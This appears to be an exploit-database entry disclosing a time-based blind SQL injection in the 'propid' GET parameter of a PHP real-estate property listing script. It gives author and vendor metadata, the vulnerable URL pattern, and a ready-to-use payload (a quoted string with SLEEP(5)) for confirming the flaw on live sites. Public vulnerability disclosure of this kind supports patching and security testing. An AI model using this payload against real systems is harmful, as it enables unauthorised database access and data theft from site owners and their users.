EXPLOITS

Property Listing Script - 'propid' Blind SQL Injection

Author: Kaan KAMIS
type: webapps
platform: php
port: 
date_added: 2017-02-02  
date_updated: 2017-02-02  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 41225.txt  

Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.

Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind

Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop